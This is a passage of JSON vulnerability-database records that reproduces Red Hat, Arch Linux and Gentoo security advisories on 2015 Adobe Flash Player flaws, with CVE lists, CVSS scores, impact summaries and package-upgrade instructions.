"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0310", "CVE-2015-0311", "CVE-2015-0312"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-02, and\nAPSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-0310, CVE-2015-0311, CVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.440.\n", "modified": "2018-06-07T09:04:19", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0094", "href": "https://access.redhat.com/errata/RHSA-2015:0094", "type": "redhat", "title": "(RHSA-2015:0094) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0235", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306"], "description": "- CVE-2015-0311 (remote code execution)\n\nUnspecified vulnerability allows remote attackers to execute arbitrary\ncode via unknown vectors, as exploited in the wild in January 2015.\n\n- CVE-2015-0309 (remote code execution)\n\nHeap-based buffer overflow allows attackers to execute arbitrary code\nvia unspecified vectors, a different vulnerability than CVE-2015-0304.\n\n- CVE-2015-0308 (remote code execution)\n\nUse-after-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0307 (memory leaks, denial of service)\n\nA vulnerability allows remote attackers to obtain sensitive information\nfrom process memory or cause a denial of service (out-of-bounds read)\nvia unspecified vectors.\n\n- CVE-2015-0306 (remote code execution, denial of service)\n\nA vulnerability allows attackers to execute arbitrary code or cause a\ndenial of service (memory corruption) via unspecified vectors, a\ndifferent vulnerability than CVE-2015-0303.\n\n- CVE-2015-0305 (remote code execution)\n\nA vulnerability allows attackers to execute arbitrary code by leveraging\nan unspecified "type confusion".\n\n- CVE-2015-0304 (remote code execution)\n\nHeap-based buffer overflow allows attackers to execute arbitrary code\nvia unspecified vectors, a different vulnerability than CVE-2015-0309.\n\n- CVE-2015-0303 (remote code execution, denial of service)\n\nA vulnerability allows attackers to execute arbitrary code or cause a\ndenial of service (memory corruption) via unspecified vectors, a\ndifferent vulnerability than CVE-2015-0306.\n\n- CVE-2015-0302 (keylogging)\n\nA vulnerability allows attackers to obtain sensitive keystroke\ninformation via unspecified vectors.\n\n- CVE-2015-0301 (file validation)\n\nThe flashplugin does not properly validate files, which has unspecified\nimpact and attack vectors.", "modified": "2015-01-23T00:00:00", "published": "2015-01-23T00:00:00", "id": "ASA-201501-22", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000220.html", "type": "archlinux", "title": "flashplugin: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0326", "CVE-2015-0328", "CVE-2015-0329", "CVE-2015-0327", "CVE-2015-0321", "CVE-2015-0317", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0330", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0314", "CVE-2015-0302", "CVE-2015-0322", "CVE-2015-0324", "CVE-2015-0315", "CVE-2015-0311", "CVE-2015-0318", "CVE-2015-0307", "CVE-2015-0319", "CVE-2015-0325", "CVE-2015-0316", "CVE-2015-0306", "CVE-2015-0320", "CVE-2015-0310", "CVE-2015-0323"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.442\"", "edition": 1, "modified": "2015-02-06T00:00:00", "published": "2015-02-06T00:00:00", "id": "GLSA-201502-02", "href": "https://security.gentoo.org/glsa/201502-02", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
